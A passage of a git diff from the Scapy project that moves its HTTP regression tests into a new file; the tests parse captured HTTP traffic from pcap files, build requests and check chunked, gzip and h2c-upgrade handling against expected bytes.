a split header exists in the packet -assert pkts[5].User_Agent == b'example_user_agent' - -# Verify all of the response data exists in the packet -assert int(pkts[7][HTTP].Content_Length.decode()) == len(pkts[7][Raw].load) - -= HTTP build - -pkt = TCP()/HTTP()/HTTPRequest(Method=b'GET', Path=b'/download', Http_Version=b'HTTP/1.1', Accept=b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', Accept_Encoding=b'gzip, deflate', Accept_Language=b'en-US,en;q=0.5', Cache_Control=b'max-age=0', Connection=b'keep-alive', Host=b'scapy.net', User_Agent=b'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0') -raw_pkt = raw(pkt) -raw_pkt -assert raw_pkt == b'\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00GET /download HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nHost: scapy.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\n\r\n' - -= HTTP 1.1 -> HTTP 2.0 Upgrade (h2c) -~ Test h2c - -conf.debug_dissector = True -load_layer("http") -from scapy.contrib.http2 import H2Frame - -import os - -tmp = "/test/pcaps/http2_h2c.pcap" -filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp -filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename - -pkts = sniff(offline=filename, session=TCPSession) - -assert HTTPResponse in pkts[1] -assert pkts[1].Connection == b"Upgrade" -assert H2Frame in pkts[1] -assert pkts[1][H2Frame].settings[0].id == 3 - -for i in range(3, 10): - assert HTTP not in pkts[i] - assert H2Frame in pkts[i] - -= Test chunked with gzip - -conf.contribs["http"]["auto_compression"] = False -z = b'\x1f\x8b\x08\x00S\\-_\x02\xff\xb3\xc9(\xc9\xcd\xb1\xcb\xcd)\xb0\xd1\x07\xb3\x00\xe6\xedpt\x10\x00\x00\x00' -a = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=1)/HTTP()/HTTPResponse(Content_Encoding="gzip", Transfer_Encoding="chunked")/(b"5\r\n" + z[:5] + b"\r\n") -b = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=len(a[TCP].payload)+1)/HTTP()/(hex(len(z[5:])).encode()[2:] + b"\r\n" + z[5:] + b"\r\n0\r\n\r\n") -xa, xb = IP(raw(a)), IP(raw(b)) -conf.contribs["http"]["auto_compression"] = True - -c = sniff(offline=[xa, xb], session=TCPSession)[0] -assert gzip_decompress(z) == c.load - ############ ############ diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts new file mode 100644 index 00000000000..b60631c9c82 --- /dev/null +++ b/test/scapy/layers/http.uts @@ -0,0 +1,236 @@ +% HTTP regression tests for Scapy + +############ +############ ++ HTTP + += TCPSession - dissect HTTP 1.0 chunked image +~ http + +load_layer("http") + +import os + +tmp = "/test/pcaps/http_chunk.pcap.gz" +filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"../")) + tmp +filename = os.getenv("SCAPY_ROOT_DIR")+tmp if not os.path.exists(filename) else filename + +a = sniff(offline=filename, session=TCPSession) + +a[2].show() +assert HTTPRequest in a[2] +assert a[2].Path == b'/httpgallery/chunked/chunkedimage.aspx?0.2911017199439567' +assert a[2].Accept_Encoding == b'gzip, deflate' +assert a[2].Accept == b'image/webp,image/apng,image/*,*/*;q=0.8' +assert a[2].Http_Version == b'HTTP/1.1' +assert a[2].Referer == b'http://www.httpwatch.com/httpgallery/chunked/' + +a[29].show() +assert HTTPResponse in a[29] +assert a[29].Transfer_Encoding == b"chunked" +assert a[29].Content_Type == b'image/jpeg; charset=utf-8' +assert a[29].Http_Version == b'HTTP/1.1' +assert a[29].Status_Code == b"200" +assert a[29].Reason_Phrase == b"OK" +assert len(a[29].load) == 33653 +# According to wireshark: +wireshark_data = b'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